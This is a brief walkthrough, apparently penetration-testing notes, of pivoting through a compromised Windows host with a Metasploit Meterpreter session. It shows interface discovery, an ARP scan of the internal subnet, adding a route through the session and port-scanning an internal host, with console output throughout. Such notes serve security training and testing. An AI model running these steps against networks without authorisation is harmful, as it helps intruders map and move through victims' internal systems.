Performing remote network scan via meterpreter session.
Check IP configuration of compromised host:
meterpreter > ifconfig
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 00:50:56:87:a6:9c
MTU : 1500
IPv4 Address : 10.32.120.15
IPv4 Netmask : 255.255.255.0
ARP scan of remote subnet. Using -r to set the target address range:
meterpreter > run arp_scanner -r 10.32.120.0/24
[*] ARP Scanning 10.32.120.0/24
[*] IP: 10.32.120.1 MAC 00:50:56:87:57:35
[*] IP: 10.32.120.8 MAC 00:50:56:87:00:8d
[*] IP: 10.32.120.15 MAC 00:50:56:87:a6:9c
[*] IP: 10.32.120.13 MAC 00:50:56:87:7c:23
[*] IP: 10.32.120.17 MAC 00:50:56:87:44:51Background session and then add a new route, specifying the session number:
meterpreter > background
[*] Backgrounding session 1...
msf5 > route add 10.32.120.0 255.255.255.0 1
[*] Route added
msf5 > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
10.32.120.0 255.255.255.0 Session 1Configure auxiliary port scanner for any identified hosts:
msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 10.32.120.8
rhosts => 10.32.120.8
msf5 auxiliary(scanner/portscan/tcp) > run
[+] 10.32.120.8: - 10.32.120.8:135 - TCP OPEN
[+] 10.32.120.8: - 10.32.120.8:139 - TCP OPEN
[+] 10.32.120.8: - 10.32.120.8:445 - TCP OPEN
[*] 10.32.120.8: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Jason Palm 